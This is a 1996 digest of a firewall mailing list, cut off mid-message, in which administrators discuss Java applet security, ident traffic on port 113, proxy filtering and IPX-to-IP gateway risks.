http://www.fortified.com/fortified Home of the Free Internet Firewall Evaluation Checklist From firewalls-owner Fri Feb 9 08:38:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA17005 for firewalls-outgoing; Fri, 9 Feb 1996 08:23:59 -0800 (PST) Received: from servant ([205.172.9.36]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA17000 for ; Fri, 9 Feb 1996 08:23:54 -0800 (PST) Received: from radiatore.mccaw-stg.com by servant (5.x/SMI-SVR4) id AA05393; Fri, 9 Feb 1996 08:22:57 -0800 Received: by radiatore.mccaw-stg.com (5.x/SMI-SVR4) id AA02154; Fri, 9 Feb 1996 08:22:56 -0800 Date: Fri, 9 Feb 1996 08:22:56 -0800 From: peterg@mccaw-stg.com (Peter Gregory) Message-Id: <9602091622.AA02154@radiatore.mccaw-stg.com> To: goran@btj.se, jcmurphy@smurfland.cit.buffalo.edu Subject: Re: JAVA security problem ? Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Goran Svensson says: >There exist a possibility for a Java applet to open up a outbound socket >connection (I have not verified this myself) from the Browser. If the > > [...] > >Examples that spring to my mind is to attack a screening router from >within a trusted network, launch rsh commands that otherwise would not Jeff Murphy says: > (as far as i know) in the current incarnation of java (beta) that is > available via the netscape browser.. applets are restricted to opening > socket connections back to the server from whence they came only. i think > this would foil an applets attempt to open a socket to your screening > router (presumably in an attempt to muck with its configuration). Jeff, I think you missed the point. *I* think that what Goran asks is this: "What if the Java applet and its server (where it came from) are in kahoots to launch an attack on the client (ie. browsing) system? Seems to me it would be easy to launch a denial of service attack on the client machine, given that the browser will allow communication (of ANY nature!) between the server and client." Just because the browser allows communication between client and server doesn't mean the communication is going to be friendly. Sure, the Java applet doesn't have access to the filesystem (ie. can't send /etc/passwd back to the original server), but that doesn't mean that harm can't be done. Peter Gregory -- Peter Gregory [NICname PG11] peter.gregory@asix.com Consulting Manager ASIX Inc., 777 108th Ave. NE, Suite 1830, Bellevue WA 98004-5118 From firewalls-owner Fri Feb 9 08:54:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA17600 for firewalls-outgoing; Fri, 9 Feb 1996 08:40:35 -0800 (PST) Received: from dialup.oar.net (dialup.oar.net [131.187.1.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA17595 for ; Fri, 9 Feb 1996 08:40:29 -0800 (PST) Received: from sun1plus.liebert.com for legg@sun1plus.liebert.com by dialup.oar.net (8.6.10/931123.1402) id LAA13977; Fri, 9 Feb 1996 11:37:27 -0500 Received: from td407 by sun1plus.liebert.com (5.0/SMI-SVR4) id AA25002; Fri, 9 Feb 1996 11:36:04 +0500 Date: Fri, 9 Feb 1996 11:36:03 +0500 Message-Id: <9602091636.AA25002@sun1plus.liebert.com> X-Sender: legg@sun1plus X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Jim Legg Subject: port 113? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I noticed in my log files the following (just a snippet): 2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn 2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) 2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) 2/9-10:42:17-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) 2/9-10:42:29-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) 2/9-10:42:53-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) 2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn 2/9-10:42:55-81 tcp 199.18.25.195/3056 -> 206.214.232.100/www 44 syn 2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) 2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) 2/9-10:42:58-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) 2/9-10:42:59-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) 2/9-10:43:04-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) 2/9-10:43:05-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) When this web site (nslookup returns Facade.COM) is accessed it tries to come back to your system on port 113. What is this port? (It's not listed in my /etc/services) Thanks. -jim- ___________________________________________________________________________ | | | | Jim Legg legg@liebert.com (smtp) | Speaking for myself... | | leggj@liebert.com (cc:Mail) | | |_______________________________________|___________________________________| From firewalls-owner Fri Feb 9 09:54:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA19600 for firewalls-outgoing; Fri, 9 Feb 1996 09:28:41 -0800 (PST) Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA19592 for ; Fri, 9 Feb 1996 09:28:32 -0800 (PST) Received: from london.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA28593; Fri, 9 Feb 96 12:27:39 -0500 Received: by london.csd.harris.com (5.61/HARRIS-4.0) id AA12653; Fri, 9 Feb 96 17:27:40 GMT From: jon@london.hcsc.com (Jon Shallow) Message-Id: <9602091727.AA12653@london.csd.harris.com> Subject: Re: Product selection To: peter@nmti.com Date: Fri, 9 Feb 96 17:27:39 GMT Cc: jon@london.hcsc.com, firewalls@GreatCircle.COM In-Reply-To: <9602081950.AA15314@sonic.nmti.com.nmti.com>; from "Peter da Silva" at Feb 8, 96 1:50 pm X-Mailer: ELM [version 2.2 PL10] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > Assume that sendmail was installed badly, and is still running as a 'root' > > process. A 'feature' is found where the incoming mail session is able to > > take control. > > > > This mail session at worst can only corrupt the NETWORK domain, in > > particular, only the Virtual Address Space of this mail session. > > In particular, it can open new network connections (otherwise it can't > forward mail!). For example, a proxy TCP connection between phreak.net > and exploitable.victim.com. > Depends on how the firewall is set up. A firewall worth its salt these days will have both dynamic (state driven ) packet filtering and proxies. The proxy could try to establish another TCP connection, but this connection would have to be permitted by the packet filtering. For example, on the Harris CyberGuard, to enable communications through a proxy would require a single packet filter rule of the form:- proxy telnet outside_network inside_network All traffic that is not 'telnet traffic going between outside_network and inside_network' is denied. Any telnet traffic initiated by outside_host to inside_host will always be forced to go through the telnet proxy for authentication etc. To put it another way, 'ip_forwarding is on', but the packets are ip_forwarded through the proxy. If the proxy (telnet in this case) on the firewall tries to open up any IP connection other than to destination host/telnet, it will be denied with alarms being set off. Unless the proxy has overwritten the stack with new 'socket' code, any new executable created by the proxy will be unable to make any network connections. Regards Jon -- Jon Shallow, Harris Computer Systems Corporation Jon.Shallow@mail.hcsc.com Tel +44 (0) 1276 686886 Fax +44 (0) 1276 678733 From firewalls-owner Fri Feb 9 10:39:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA20395 for firewalls-outgoing; Fri, 9 Feb 1996 09:44:57 -0800 (PST) Received: from svcs1.digex.net (svcs1.digex.net [204.91.197.224]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA20382 for ; Fri, 9 Feb 1996 09:44:52 -0800 (PST) Received: from fred.digex.net (fred.digex.net [164.109.213.78]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id MAA03973 for ; Fri, 9 Feb 1996 12:44:06 -0500 Message-ID: <311B874F.5827@access.digex.net> Date: Fri, 09 Feb 1996 12:41:35 -0500 From: "Eliot T. Ware" X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: Firewall ListServer Subject: NetWare LAN Security using IP-IPX Gateway Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am new to the entire subject of firewalls and am looking for comments on the relative security of IPX-based assets on an IPX only LAN which is connected to an IP network (Internet mainly) via an IP-IPX gateway. Is there a way to access the IPX-based assets from the IP side and do harm? If so, how (either theory or actual methods) and can the risk be further mitigated? This information will be used to assist us in determining the relative risks. Thanks for your time. -Eliot -- Eliot T. Ware, CNE voice: (202) 622-1302 Global Systems Architect fax: (202) 622-2582 Department of the Treasury (UNIBAND) preferred: etware@access.digex.net alternate: eliot.ware@treas.sprint.com From firewalls-owner Fri Feb 9 10:54:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22967 for firewalls-outgoing; Fri, 9 Feb 1996 10:50:47 -0800 (PST) Received: from mclo20 ([164.167.86.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA22962 for ; Fri, 9 Feb 1996 10:50:37 -0800 (PST) Received: from [164.167.86.100] by mclo20.med.navy.mil (SMTPD32-95.07.27) id A875116016E; Fri Feb 09 13:54:45 1996 Message-ID: <311B960A.1949@mclo10.med.navy.mil> Date: Fri, 09 Feb 1996 13:44:26 -0500 From: Bob Resino Organization: MCLO, HSO, Norfolk, VA (US Navy) X-Mailer: Mozilla 2.0b5 (Win95; I) MIME-Version: 1.0 To: Jim Legg CC: firewalls@GreatCircle.COM Subject: Re: port 113? References: <9602091636.AA25002@sun1plus.liebert.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jim Legg wrote: > > Hi, > > I noticed in my log files the following (just a snippet): > > 2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn > 2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) > 2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) > 2/9-10:42:17-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) > 2/9-10:42:29-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) > 2/9-10:42:53-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) > 2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn > 2/9-10:42:55-81 tcp 199.18.25.195/3056 -> 206.214.232.100/www 44 syn > 2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) > 2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) > 2/9-10:42:58-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) > 2/9-10:42:59-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) > 2/9-10:43:04-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) > 2/9-10:43:05-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) > > When this web site (nslookup returns Facade.COM) is accessed it tries to come > back to your system on port 113. What is this port? (It's not listed in my > /etc/services) > > Thanks. > > -jim-RFC 1700 lists TCP 113 and UDP 113 as the authentication service. RFC 1409 introduces a list of authentication types. Bob Resino From firewalls-owner Fri Feb 9 11:13:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA23178 for firewalls-outgoing; Fri, 9 Feb 1996 10:57:17 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA23173 for ; Fri, 9 Feb 1996 10:57:10 -0800 (PST) Received: from cixgate by relay2.UU.NET with SMTP id QQacfb06293; Fri, 9 Feb 1996 13:54:13 -0500 (EST) Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA12477; Fri, 9 Feb 96 11:03:24 PST Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA02724; Fri, 9 Feb 96 10:48:01 PST Date: Fri, 9 Feb 96 10:48:01 PST From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9602091848.AA02724@manzanita.DEV.3Com.COM.noname> To: firewalls@greatcircle.com, Dick_Wall@stratus.com Subject: Re: Non-company Access ?? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You can set up what we refer to as a vendor network. It has (for dial up users) both access control, and router filtering to restrict what they can do once they are in. This can also be done with X.25, Frame Relay, leased lines, whatever. IP is generally easier to control than IPX, but both are workable with careful filtering. BobK From firewalls-owner Fri Feb 9 11:27:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA21628 for firewalls-outgoing; Fri, 9 Feb 1996 10:19:27 -0800 (PST) Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA21623 for ; Fri, 9 Feb 1996 10:19:20 -0800 (PST) Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.7.3/8.6.4) id NAA15401; Fri, 9 Feb 1996 13:18:32 -0500 (EST) From: Jeff Murphy Message-Id: <199602091818.NAA15401@smurfland.cit.buffalo.edu> Subject: Re: JAVA security problem ? To: ken@bridge.com (Ken Hardy) Date: Fri, 9 Feb 1996 13:18:32 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <199602091516.AA02496@ignatz.bridge.com> from "Ken Hardy" at Feb 9, 96 09:16:19 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >The most straightforward way I see of getting this to work through a >bastion host is to use Socks. Netscape has a setting for Socks >configuration. from the java beta3 api doc: public final class Socket extends Object This is the basic socket class. It is currently 'SOCKSified' so if you have SOCKS_HOST and SOCKS_PORT set, and the address cannot be connected to locally, then we try going through sockd. >million machines to crack a 40-bit RC4 password, albeit not with >machine code? :-O very interesting ;) how many machines participated in that RSA factorization that went on a few years back? i think it took them 10 or so months to do it? i can't remember all of the details.. From firewalls-owner Fri Feb 9 11:44:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22255 for firewalls-outgoing; Fri, 9 Feb 1996 10:34:50 -0800 (PST) Received: from server. ([198.199.198.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA22250 for ; Fri, 9 Feb 1996 10:34:45 -0800 (PST) Received: from DMT.fc.com ([198.199.198.164]) by server. (8.6.12/8.6.12) with SMTP id PAA13962 for ; Fri, 9 Feb 1996 15:08:25 -0500 Message-ID: <311B939B.32FC@fc.com> Date: Fri, 09 Feb 1996 13:34:03 -0500 From: "Douglas M. Todd, Jr." Organization: fc.com X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Would anyone know how to route www.foobar.COM Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk to foobar.com on an DNS server? Where in the named file & what format is it in? ==DMT> -- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >Douglas M. Todd, Jr. fc.com, Inc. One Federal Street BLD 102 Springfield, MA 01105 PHN: 413-733-7333 FAX: 413-733-7725 Email: Doug@fc.com or Bunyan@msn.com From firewalls-owner Fri Feb 9 11:45:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA23698 for firewalls-outgoing; Fri, 9 Feb 1996 11:03:52 -0800 (PST) Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA23684 for ; Fri, 9 Feb 1996 11:03:46 -0800 (PST) Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.7.3/8.6.4) id OAA16136; Fri, 9 Feb 1996 14:02:50 -0500 (EST) From: Jeff Murphy Message-Id: <199602091902.OAA16136@smurfland.cit.buffalo.edu> Subject: Re: JAVA security problem ? To: peterg@mccaw-stg.com (Peter Gregory) Date: Fri, 9 Feb 1996 14:02:50 -0500 (EST) Cc: goran@btj.se, firewalls@greatcircle.com In-Reply-To: <9602091622.AA02154@radiatore.mccaw-stg.com> from "Peter Gregory" at Feb 9, 96 08:22:56 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >"What if the Java applet and its server (where it came from) are in kahoots >to launch an attack on the client (ie. browsing) system? Seems to me it >would be easy to launch a denial of service attack on the client machine, >given that the browser will allow communication (of ANY nature!) between >the server and client." the following seems to read "can an applet attack your internal network because it has been downloaded past your firewall". the answer is 'no'. >>There exist a possibility for a Java applet to open up a outbound socket >>connection (I have not verified this myself) from the Browser. If the >> >> [...] >> >>Examples that spring to my mind is to attack a screening router from >>within a trusted network, launch rsh commands that otherwise would not as you pointed out, the applet can open a connection back to the server host and just blurt as much traffic back to it as possible. this might impede firewall performance depending upon the how fast your fw is and how efficient java is. i have some server/client java code that i can use to see how much traffic it can generate. i dont see what else an applet can do in terms of malicious activity. the user will most likely notice that their browser is running dog slow because of the applet and they will move off of the page and the applet will die. From firewalls-owner Fri Feb 9 11:54:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA25598 for firewalls-outgoing; Fri, 9 Feb 1996 11:41:49 -0800 (PST) Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA25593 for ; Fri, 9 Feb 1996 11:41:41 -0800 (PST) Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.7.3/8.6.4) id OAA16654; Fri, 9 Feb 1996 14:40:41 -0500 (EST) From: Jeff Murphy Message-Id: <199602091940.OAA16654@smurfland.cit.buffalo.edu> Subject: Re: JAVA security problem ? To: proberts@clark.net (Paul D. Robertson) Date: Fri, 9 Feb 1996 14:40:40 -0500 (EST) Cc: ken@bridge.com, firewalls@GreatCircle.COM In-Reply-To: from "Paul D. Robertson" at Feb 9, 96 10:18:29 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk note: i'm not a java proponent. i'm really only 'play' with it from time to time. but the statements like the following are so vague and general. many people say "ohmygawd.. executing code! it's badbadbad!" but never state in what ways it is bad. if you cite specifics, i'm sure you'll find that the java security people have covered the bases. if you find something that is not covered: even better, because it should be fixed asap. please share your imaginings.. i'm interested in hearing about how you can hack from java. >Depends on what's running on the host, and what it's connected to. >I can imagine lots of bad things, which would take evil code, but then >that seems to be a matter of putting "click here" on a page now-a-days. From firewalls-owner Fri Feb 9 11:59:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22473 for firewalls-outgoing; Fri, 9 Feb 1996 10:41:00 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA22465 for ; Fri, 9 Feb 1996 10:40:55 -0800 (PST) Received: from bastion.ppt.com by relay6.UU.NET with ESMTP id QQacfa24238; Fri, 9 Feb 1996 13:40:08 -0500 (EST) Received: from firewall.ppt.com (fw.ppt.com [206.220.97.2]) by bastion.ppt.com (8.7.3/8.7.3) with ESMTP id KAA16682 for ; Fri, 9 Feb 1996 10:40:10 -0800 (PST) Received: from ruby.ppt.com (ruby.ppt.com [198.102.200.15]) by firewall.ppt.com (8.7.3/8.7.3) with ESMTP id KAA22307 for ; Fri, 9 Feb 1996 10:40:09 -0800 (PST) Received: (from drc@localhost) by ruby.ppt.com (8.7.3/8.7.3) id KAA11899 for firewalls@greatcircle.com; Fri, 9 Feb 1996 10:40:02 -0800 (PST) From: "david r coelho" Message-Id: <9602091040.ZM11897@ppt.com> Date: Fri, 9 Feb 1996 10:40:02 -0800 X-Mailer: Z-Mail (3.2.1 10oct95) To: firewalls@greatcircle.com Subject: Web browser ports? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm getting some incoming packets to our Web server with src ports that are less than 1023. Are there browsers out there that use ports below 1023? Should I allow connections of the type: tcp src < 1023 dst = 80 -- david r. coelho email: drc@ppt.COM personal productivity tools, inc http://www.ppt.com 14141 miranda rd voice: (415) 917-7000 los altos hills, ca 94022-2045 usa fax: (415) 917-7010 From firewalls-owner Fri Feb 9 12:09:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA20742 for firewalls-outgoing; Fri, 9 Feb 1996 09:57:29 -0800 (PST) Received: from svcs1.digex.net (svcs1.digex.net [204.91.197.224]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA20735 for ; Fri, 9 Feb 1996 09:57:24 -0800 (PST) Received: from fred.digex.net (fred.digex.net [164.109.213.78]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id MAA04193; Fri, 9 Feb 1996 12:51:32 -0500 Message-ID: <311B890D.7100@access.digex.net> Date: Fri, 09 Feb 1996 12:49:01 -0500 From: "Eliot T. Ware" X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: Remo Inverardi CC: Firewall ListServer Subject: Re: Re[2]: routing table go through firewall ? References: <1996Feb08.154211.1590.2773@abainet.abacus.ch> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Remo Inverardi wrote: > > Just a little question that doesn't belong here, > but who cares? ;) (you? sorry.) > > We want to run IPX/SPX and TCP/IP on the same > network (over the same cable). Now the problem > is, that there are several Novell Servers between > us and the router that does connect us to the > internet. Those Novell Servers seem to only pass > on IPX/SPC packets and filter all TCP/IP traffic > out. Where's the problem? Do we need to install > any NLMs or something similar? > > bye and thanks for your help. iNVi. > > ---------------------------------------------------------------------- > Remo Inverardi - Voice +41 61 811 14 82 - Fax and BBS +41 61 811 14 42 > ABACUS Software Research AG - Rorschacherstr. 170 - CH-9006 St. Gallen > ---------------------------------------------------------------------- >From your question, I assume the Novell servers are performing as routers. If that is the case, you will need to enable TCP/IP on the Novell servers and configure to route as necessary. This involves loading the TCPIP.NLM with the appropriate parameters and BINDing IP to both sides of the router in the server. Information on TCP/IP configuration can be found in the Red Book titled (I believe) "TCP/IP for Supervisors". -Eliot -- Eliot T. Ware, CNE voice: (202) 622-1302 Global Systems Architect fax: (202) 622-2582 Department of the Treasury (UNIBAND) preferred: etware@access.digex.net alternate: eliot.ware@treas.sprint.com From firewalls-owner Fri Feb 9 12:23:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA21333 for firewalls-outgoing; Fri, 9 Feb 1996 10:11:25 -0800 (PST) Received: from maildrop.micrognosis.com (supernova.micrognosis.com [192.233.13.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA21328 for ; Fri, 9 Feb 1996 10:11:20 -0800 (PST) Received: by maildrop.micrognosis.com (4.1/SMI-4.1) id AA25917; Fri, 9 Feb 96 13:10:29 EST Received: from singhi.corp.micrognosis.com(193.32.166.28) by supernova.micrognosis.com via smap (V1.3) id sma025898; Fri Feb 9 13:10:05 1996 Received: from java (java.corp.micrognosis.com) by corp.micrognosis.com (4.1/1.0-integ.cf) id AA20983; Fri, 9 Feb 96 13:13:42 EST Received: from java by java (SMI-8.6/SMI-SVR4) id NAA05898; Fri, 9 Feb 1996 13:15:26 -0500 Message-Id: <311B8F3E.5F14@corp.micrognosis.com> Date: Fri, 09 Feb 1996 13:15:26 -0500 From: Adam Jack Organization: CSK/Micrognosis Inc. X-Mailer: Mozilla 2.0b6a (X11; I; SunOS 5.5 sun4m) Mime-Version: 1.0 To: "Paul D. Robertson" Cc: firewalls@greatcircle.com Subject: Re: JAVA security problem ? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul D. Robertson wrote: > > [...] I don't want my users running anything > that hasn't been approved. With a proxy, at least I'm assured that > its HTTP that's being spoken. > That fair. I imagine that is part of the reason why Applets within Netscape do not have access to SOCKS or https. > > Your Paranioa May Vary > Maybe - but I doubt that of the Netscape laywers will... Adam -- +1-203-730-5437 | http://www.micrognosis.com/~ajack/index.html ajack@corp.micrognosis.com -> ajack@netcom.com -> ajack@?.??? From firewalls-owner Fri Feb 9 12:24:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22322 for firewalls-outgoing; Fri, 9 Feb 1996 10:38:04 -0800 (PST) Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA22260 for ; Fri, 9 Feb 1996 10:36:14 -0800 (PST) Received: from assateague.ch.inri.com (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id NAA15042; Fri, 9 Feb 1996 13:37:34 -0500 Date: Fri, 9 Feb 1996 13:37:34 -0500 Message-Id: <199602091837.NAA15042@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Jim Legg , firewalls@GreatCircle.COM From: wbunting@ch.inri.com (Bill Bunting) Subject: Re: port 113? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:36 AM 2/9/96 +0500, Jim Legg wrote: >Hi, > >I noticed in my log files the following (just a snippet): > >2/9-10:42:07-81 tcp 199.18.25.195/3054 -> 206.214.232.100/www 44 syn >2/9-10:42:08-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) >2/9-10:42:11-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) >2/9-10:42:17-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) >2/9-10:42:29-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) >2/9-10:42:53-81 tcp 199.18.25.195/113 <- 206.214.232.100/1867 44 syn !pass(64) >2/9-10:42:55-81 tcp 199.18.25.195/3055 -> 206.214.232.100/www 44 syn >2/9-10:42:55-81 tcp 199.18.25.195/3056 -> 206.214.232.100/www 44 syn >2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) >2/9-10:42:56-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) >2/9-10:42:58-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) >2/9-10:42:59-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) >2/9-10:43:04-81 tcp 199.18.25.195/113 <- 206.214.232.100/2005 44 syn !pass(64) >2/9-10:43:05-81 tcp 199.18.25.195/113 <- 206.214.232.100/2007 44 syn !pass(64) > >When this web site (nslookup returns Facade.COM) is accessed it tries to come >back to your system on port 113. What is this port? (It's not listed in my >/etc/services) This is the ident protocol. The WWW server is trying to associate a user name with the connection by using the identification protocol. Sendmail will do the same thing (if configured). --------------------------------------- | Bill Bunting, Software Engineer | ****** |Inter-National Research Institute, Inc.| ***_******_ __ _ | 1441 Crossways Boulevard, Suite 102 | ===//=/\**//=/- )==//= | Chesapeake, Virginia 23320 | {==//=//\\//=//||==//== | V(804)424-8675 F(804)420-4262 | =//=//==\/*//=||=//=== | (wbunting@inri.com) | ********* | (bunting@cs.odu.edu) | ***** | http://www.cs.odu.edu/~bunting | --------------------------------------- From firewalls-owner Fri Feb 9 12:43:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA21911 for firewalls-outgoing; Fri, 9 Feb 1996 10:27:14 -0800 (PST) Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA21906 for ; Fri, 9 Feb 1996 10:27:06 -0800 (PST) Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.7.3/8.6.4) id NAA15491; Fri, 9 Feb 1996 13:26:07 -0500 (EST) From: Jeff Murphy Message-Id: <199602091826.NAA15491@smurfland.cit.buffalo.edu> Subject: Re: JAVA security problem ? To: mdr@vodka.sse.att.com Date: Fri, 9 Feb 1996 13:26:06 -0500 (EST) Cc: Firewalls@greatcircle.com In-Reply-To: <9602091542.AA11672@ig4.att.att.com> from "mdr@vodka.sse.att.com" at Feb 9, 96 10:50:36 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >An how do they know from whence they came? Do I smell an IP spoofing >attack? in netscape, you open a URL .. http://www.foo.com/applet.html and it downloads an applet.. the applet 